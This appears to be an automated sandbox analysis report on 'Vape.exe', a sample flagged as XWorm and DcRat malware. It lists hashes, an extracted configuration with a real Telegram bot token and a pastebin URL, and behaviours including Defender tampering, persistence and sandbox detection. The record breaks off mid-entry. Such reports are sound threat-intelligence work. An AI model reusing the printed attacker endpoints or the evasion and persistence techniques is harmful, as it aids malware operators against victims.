Analysis
-
max time kernel
1800s -
max time network
1797s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 13:40
Static task
static1
Behavioral task
behavioral1
Sample
Vape.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Vape.exe
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
Vape.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
Vape.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
Vape.exe
Resource
win11-20240508-en
Behavioral task
behavioral6
Sample
Vape.exe
Resource
macos-20240410-en
General
-
Target
Vape.exe
-
Size
16.9MB
-
MD5
b682cd3286eb0cd188dc896d6fd7fa0c
-
SHA1
f6f15cbc94072cbdab5ae4548c4b13d787f6f617
-
SHA256
66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b
-
SHA512
a30ada153f1c2ead70bbe27b3bb770512d04b469ec3e3f19266f81cd06150e1297e06877c5ed899040a7a760d64d24892477df17294721fd8560082a634ce2f5
-
SSDEEP
393216:61HGgtq8HRisK/m6Smj8xBPKEUVrHCKAfcI:6tGOqKRO/9Smj8bPsxsfcI
Malware Config
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
Microsoft_WindowsDefender.exe
-
pastebin_url
https://pastebin.com/raw/dxKNAdeE
-
telegram
https://api.telegram.org/bot7013809678:AAEFwh-OW3w4YnEldOGR6NvGudG5gj8iF0Q/sendMessage?chat_id=5073217277
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Deletes Windows Defender Definitions 2 TTPs 2 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exeMpCmdRun.exepid process 4296 MpCmdRun.exe 492 MpCmdRun.exe -
Detect Xworm Payload 9 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Msvchost.exe family_xworm behavioral3/memory/3456-91-0x00000000007D0000-0x00000000007E8000-memory.dmp family_xworm behavioral3/memory/1768-1666-0x0000000000BF0000-0x0000000000C08000-memory.dmp family_xworm behavioral3/memory/4448-1766-0x0000000000640000-0x0000000000658000-memory.dmp family_xworm behavioral3/memory/1068-1875-0x0000000000370000-0x0000000000388000-memory.dmp family_xworm behavioral3/memory/708-1980-0x0000000000260000-0x0000000000278000-memory.dmp family_xworm behavioral3/memory/5660-2073-0x0000000000600000-0x0000000000618000-memory.dmp family_xworm behavioral3/memory/5796-2208-0x0000000000FF0000-0x0000000001008000-memory.dmp family_xworm behavioral3/memory/6248-2324-0x0000000000E40000-0x0000000000E58000-memory.dmp family_xworm -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3688 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3532 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4956 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 68 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3808 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 652 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 828 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1584 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4320 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3492 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4132 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4212 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2664 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 532 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 968 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1760 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1336 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2584 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 428 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4436 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4384 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1240 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3324 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4780 3060 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 196 3060 schtasks.exe wmiprvse.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe dcrat behavioral3/memory/4996-730-0x0000000000DA0000-0x0000000000F2C000-memory.dmp dcrat C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe dcrat behavioral3/memory/4756-1608-0x0000000000DF0000-0x0000000000F7C000-memory.dmp dcrat behavioral3/memory/5740-2085-0x0000000000770000-0x00000000008FC000-memory.dmp dcrat behavioral3/memory/5828-2093-0x0000000000DB0000-0x0000000000F3C000-memory.dmp dcrat behavioral3/memory/5908-2216-0x0000000000CC0000-0x0000000000E4C000-memory.dmp dcrat behavioral3/memory/6336-2335-0x0000000000140000-0x00000000002CC000-memory.dmp dcrat behavioral3/memory/6456-2466-0x0000000000E70000-0x0000000000FFC000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3344 powershell.exe 392 powershell.exe 1012 powershell.exe 1896 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops startup file 2 IoCs
Processes:
Msvchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk Msvchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk Msvchost.exe -
Executes dropped EXE 53 IoCs
Processes:
Microsoft_Protection.exeMicrosoft_crypt.exeMicrosoft_R.exeMicrosoft_R.exeMicrosoft_M.exeMsvchost.exeMicrosoft_M.exelhhsgwktkatl.exeIntoref.execsrss.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.execsrss.execmd.exeMicrosoft_WindowsDefender.exeWmiPrvSE.exeMicrosoft_WindowsDefender.exeApplicationFrameHost.exesc.exedllhost.execsrss.execmd.exeexplorer.exeOfficeClickToRun.exewininit.exeWmiPrvSE.exeunsecapp.exeApplicationFrameHost.execsrss.execmd.exesc.exedllhost.exeWmiPrvSE.execsrss.execmd.exeexplorer.exeApplicationFrameHost.exeOfficeClickToRun.exewininit.exesc.exeWmiPrvSE.exeunsecapp.execsrss.execmd.exedllhost.exeApplicationFrameHost.execsrss.execmd.exeWmiPrvSE.exeexplorer.exepid process 660 Microsoft_Protection.exe 4680 Microsoft_crypt.exe 5088 Microsoft_R.exe 4660 Microsoft_R.exe 4752 Microsoft_M.exe 3456 Msvchost.exe 4856 Microsoft_M.exe 1208 lhhsgwktkatl.exe 4996 Intoref.exe 4756 csrss.exe 1768 Microsoft_WindowsDefender.exe 4448 Microsoft_WindowsDefender.exe 1068 Microsoft_WindowsDefender.exe 708 Microsoft_WindowsDefender.exe 5660 Microsoft_WindowsDefender.exe 5740 csrss.exe 5828 cmd.exe 5796 Microsoft_WindowsDefender.exe 5908 WmiPrvSE.exe 6248 Microsoft_WindowsDefender.exe 6336 ApplicationFrameHost.exe 6456 sc.exe 7132 dllhost.exe 6296 csrss.exe 3612 cmd.exe 7236 explorer.exe 7888 OfficeClickToRun.exe 7980 wininit.exe 7900 WmiPrvSE.exe 8148 unsecapp.exe 8196 ApplicationFrameHost.exe 8852 csrss.exe 8940 cmd.exe 8964 sc.exe 9756 dllhost.exe 9844 WmiPrvSE.exe 10272 csrss.exe 10356 cmd.exe 10468 explorer.exe 11108 ApplicationFrameHost.exe 11052 OfficeClickToRun.exe 11136 wininit.exe 11736 sc.exe 11820 WmiPrvSE.exe 11892 unsecapp.exe 11884 csrss.exe 11740 cmd.exe 12848 dllhost.exe 12792 ApplicationFrameHost.exe 13936 csrss.exe 13984 cmd.exe 14080 WmiPrvSE.exe 14152 explorer.exe -
Loads dropped DLL 33 IoCs
Processes:
Microsoft_R.exeMicrosoft_M.exepid process 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4660 Microsoft_R.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe 4856 Microsoft_M.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI50882\python311.dll upx behavioral3/memory/4660-61-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp upx \Users\Admin\AppData\Local\Temp\_MEI47522\python311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50882\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50882\_ssl.pyd upx behavioral3/memory/4660-125-0x00007FFCA7090000-0x00007FFCA709F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47522\libffi-8.dll upx behavioral3/memory/4856-148-0x00007FFCA6430000-0x00007FFCA643F000-memory.dmp upx behavioral3/memory/4856-147-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47522\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47522\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47522\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47522\_lzma.pyd upx behavioral3/memory/4660-157-0x00007FFCA2F90000-0x00007FFCA3100000-memory.dmp upx behavioral3/memory/4856-162-0x00007FFCA3AD0000-0x00007FFCA3AFD000-memory.dmp upx behavioral3/memory/4660-164-0x00007FFCA36A0000-0x00007FFCA36AD000-memory.dmp upx behavioral3/memory/4660-166-0x00007FFCA3380000-0x00007FFCA3438000-memory.dmp upx behavioral3/memory/4856-171-0x00007FFCA2E20000-0x00007FFCA2F90000-memory.dmp upx behavioral3/memory/4660-181-0x00007FFC8E210000-0x00007FFC8E32C000-memory.dmp upx behavioral3/memory/4856-184-0x00007FFCA2D30000-0x00007FFCA2D3D000-memory.dmp upx behavioral3/memory/4856-186-0x00007FFC8E0F0000-0x00007FFC8E20C000-memory.dmp upx behavioral3/memory/4856-185-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp upx behavioral3/memory/4856-183-0x00007FFCA2D40000-0x00007FFCA2D54000-memory.dmp upx behavioral3/memory/4660-182-0x00007FFCA6470000-0x00007FFCA6493000-memory.dmp upx behavioral3/memory/4856-233-0x00007FFC8E0F0000-0x00007FFC8E20C000-memory.dmp upx behavioral3/memory/4660-285-0x00007FFCA2F90000-0x00007FFCA3100000-memory.dmp upx behavioral3/memory/4660-297-0x00007FFCA2DC0000-0x00007FFCA2DCD000-memory.dmp upx behavioral3/memory/4660-298-0x00007FFC8E210000-0x00007FFC8E32C000-memory.dmp upx behavioral3/memory/4660-296-0x00007FFCA2E00000-0x00007FFCA2E14000-memory.dmp upx behavioral3/memory/4660-295-0x00007FFC8E6B0000-0x00007FFC8EA29000-memory.dmp upx behavioral3/memory/4660-294-0x00007FFCA3380000-0x00007FFCA3438000-memory.dmp upx behavioral3/memory/4660-293-0x00007FFCA3670000-0x00007FFCA369E000-memory.dmp upx behavioral3/memory/4660-292-0x00007FFCA36A0000-0x00007FFCA36AD000-memory.dmp upx behavioral3/memory/4660-291-0x00007FFCA3AB0000-0x00007FFCA3AC9000-memory.dmp upx behavioral3/memory/4660-290-0x00007FFCA6330000-0x00007FFCA6353000-memory.dmp upx behavioral3/memory/4660-289-0x00007FFCA63E0000-0x00007FFCA63F9000-memory.dmp upx behavioral3/memory/4660-288-0x00007FFCA6400000-0x00007FFCA642D000-memory.dmp upx behavioral3/memory/4660-287-0x00007FFCA7090000-0x00007FFCA709F000-memory.dmp upx behavioral3/memory/4660-286-0x00007FFCA6470000-0x00007FFCA6493000-memory.dmp upx behavioral3/memory/4660-254-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp upx behavioral3/memory/4856-245-0x00007FFC8E330000-0x00007FFC8E6A9000-memory.dmp upx behavioral3/memory/4856-244-0x00007FFCA1680000-0x00007FFCA1738000-memory.dmp upx behavioral3/memory/4856-243-0x00007FFCA3370000-0x00007FFCA337D000-memory.dmp upx behavioral3/memory/4856-242-0x00007FFCA3600000-0x00007FFCA3619000-memory.dmp upx behavioral3/memory/4856-241-0x00007FFCA3620000-0x00007FFCA3643000-memory.dmp upx behavioral3/memory/4856-240-0x00007FFCA3650000-0x00007FFCA3669000-memory.dmp upx behavioral3/memory/4856-239-0x00007FFCA2E20000-0x00007FFCA2F90000-memory.dmp upx behavioral3/memory/4856-238-0x00007FFCA3AD0000-0x00007FFCA3AFD000-memory.dmp upx behavioral3/memory/4856-237-0x00007FFC8EA30000-0x00007FFC8F019000-memory.dmp upx behavioral3/memory/4856-236-0x00007FFCA6430000-0x00007FFCA643F000-memory.dmp upx behavioral3/memory/4856-235-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp upx behavioral3/memory/4856-234-0x00007FFCA2DD0000-0x00007FFCA2DFE000-memory.dmp upx behavioral3/memory/4856-232-0x00007FFCA2D30000-0x00007FFCA2D3D000-memory.dmp upx behavioral3/memory/4856-231-0x00007FFCA2D40000-0x00007FFCA2D54000-memory.dmp upx behavioral3/memory/4856-180-0x00007FFCA2DD0000-0x00007FFCA2DFE000-memory.dmp upx behavioral3/memory/4856-179-0x00007FFCA1680000-0x00007FFCA1738000-memory.dmp upx behavioral3/memory/4856-178-0x00007FFC8E330000-0x00007FFC8E6A9000-memory.dmp upx behavioral3/memory/4660-177-0x00007FFCA2DC0000-0x00007FFCA2DCD000-memory.dmp upx behavioral3/memory/4856-176-0x00007FFCA3370000-0x00007FFCA337D000-memory.dmp upx behavioral3/memory/4660-175-0x00007FFCA2E00000-0x00007FFCA2E14000-memory.dmp upx behavioral3/memory/4856-174-0x00007FFCA3600000-0x00007FFCA3619000-memory.dmp upx behavioral3/memory/4856-173-0x00007FFC8EA30000-0x00007FFC8F019000-memory.dmp upx behavioral3/memory/4660-172-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp upx behavioral3/memory/4856-170-0x00007FFCA3620000-0x00007FFCA3643000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Msvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft_WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft_WindowsDefender.exe" Msvchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 38 IoCs
Processes:
svchost.exelhhsgwktkatl.exeOfficeClickToRun.exesvchost.exesvchost.exeMicrosoft_crypt.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\wininitw svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhostd svchost.exe File opened for modification C:\Windows\System32\Tasks\cmd svchost.exe File opened for modification C:\Windows\System32\Tasks\csrssc svchost.exe File opened for modification C:\Windows\System32\Tasks\OfficeClickToRun svchost.exe File opened for modification C:\Windows\System32\Tasks\wininit svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhost svchost.exe File opened for modification C:\Windows\System32\Tasks\scs svchost.exe File opened for modification C:\Windows\System32\Tasks\unsecappu svchost.exe File opened for modification C:\Windows\System32\Tasks\explorer svchost.exe File opened for modification C:\Windows\System32\Tasks\unsecapp svchost.exe File opened for modification C:\Windows\system32\MRT.exe lhhsgwktkatl.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\WmiPrvSE svchost.exe File opened for modification C:\Windows\System32\Tasks\OfficeClickToRunO svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\sc svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\WmiPrvSEW svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe Microsoft_crypt.exe File opened for modification C:\Windows\System32\Tasks\csrss svchost.exe File opened for modification C:\Windows\System32\Tasks\cmdc svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\explorere svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File opened for modification C:\Windows\System32\Tasks\ApplicationFrameHost svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\ApplicationFrameHostA svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Microsoft_crypt.exelhhsgwktkatl.exedescription pid process target process PID 4680 set thread context of 2932 4680 Microsoft_crypt.exe dialer.exe PID 1208 set thread context of 3532 1208 lhhsgwktkatl.exe dialer.exe PID 1208 set thread context of 3592 1208 lhhsgwktkatl.exe dialer.exe PID 1208 set thread context of 1592 1208 lhhsgwktkatl.exe Conhost.exe -
Drops file in Program Files directory 20 IoCs
Processes:
Intoref.exedescription ioc process File created C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e Intoref.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\09183ef8b9d885 Intoref.exe File created C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe Intoref.exe File created C:\Program Files (x86)\Windows Defender\uk-UA\886983d96e3d3e Intoref.exe File created C:\Program Files\Windows NT\TableTextService\unsecapp.exe Intoref.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe Intoref.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\886983d96e3d3e Intoref.exe File created C:\Program Files\VideoLAN\VLC\plugins\7a0fd90576e088 Intoref.exe File created C:\Program Files\Windows NT\TableTextService\29c1c3cc0f7685 Intoref.exe File created C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe Intoref.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe Intoref.exe File created C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe Intoref.exe File created C:\Program Files\Internet Explorer\uk-UA\6dd19aba3e2428 Intoref.exe File created C:\Program Files\WindowsApps\Deleted\services.exe Intoref.exe File created C:\Program Files\Microsoft Office\PackageManifests\24dbde2999530e Intoref.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe Intoref.exe File created C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe Intoref.exe File created C:\Program Files\Windows Photo Viewer\es-ES\24dbde2999530e Intoref.exe File created C:\Program Files\VideoLAN\VLC\plugins\explorer.exe Intoref.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe Intoref.exe -
Drops file in Windows directory 5 IoCs
Processes:
Intoref.exedescription ioc process File created C:\Windows\Boot\Resources\SearchUI.exe Intoref.exe File created C:\Windows\Globalization\ELS\dllhost.exe Intoref.exe File created C:\Windows\Globalization\ELS\5940a34987c991 Intoref.exe File created C:\Windows\servicing\SQM\dllhost.exe Intoref.exe File created C:\Windows\rescache\RuntimeBroker.exe Intoref.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4320 sc.exe 6456 sc.exe 8964 sc.exe 11736 sc.exe 1316 sc.exe 4284 sc.exe 2704 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened 